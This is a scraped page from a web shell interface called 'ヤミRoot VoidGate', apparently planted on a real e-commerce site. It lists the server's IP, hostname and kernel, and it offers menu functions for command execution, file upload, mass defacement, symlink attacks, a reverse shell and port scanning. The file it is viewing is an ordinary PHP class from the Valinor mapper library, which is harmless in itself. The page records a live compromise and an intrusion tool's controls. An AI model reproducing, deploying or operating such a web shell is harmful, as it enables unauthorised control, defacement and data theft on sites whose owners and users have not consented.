ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
vendor
/
cuyz
/
valinor
/
src
/
Mapper
/
Source
/
Viewing: Source.php
<?php declare(strict_types=1); namespace CuyZ\Valinor\Mapper\Source; use CuyZ\Valinor\Mapper\Source\Exception\InvalidSource; use CuyZ\Valinor\Mapper\Source\Modifier\CamelCaseKeys; use CuyZ\Valinor\Mapper\Source\Modifier\PathMapping; use IteratorAggregate; use SplFileObject; use Traversable; /** * @api * * @implements IteratorAggregate<mixed> */ final class Source implements IteratorAggregate { private function __construct( /** @var iterable<mixed> */ private iterable $delegate ) {} /** * @pure * @param iterable<mixed> $data */ public static function iterable(iterable $data): Source { return new Source($data); } /** * @pure * @param array<mixed> $data */ public static function array(array $data): Source { return new Source($data); } /** * @pure * @throws InvalidSource */ public static function json(string $jsonSource): Source { return new Source(new JsonSource($jsonSource)); } /** * @pure * @throws InvalidSource */ public static function yaml(string $yamlSource): Source { return new Source(new YamlSource($yamlSource)); } /** @pure */ public static function file(SplFileObject $file): Source { return new Source(new FileSource($file)); } /** @pure */ public function camelCaseKeys(): Source { return new Source(new CamelCaseKeys($this)); } /** * @pure * @param array<string> $map */ public function map(array $map): Source { return new Source(new PathMapping($this, $map)); } public function getIterator(): Traversable { yield from $this->delegate; } }
Coded With 💗 by
0x6ick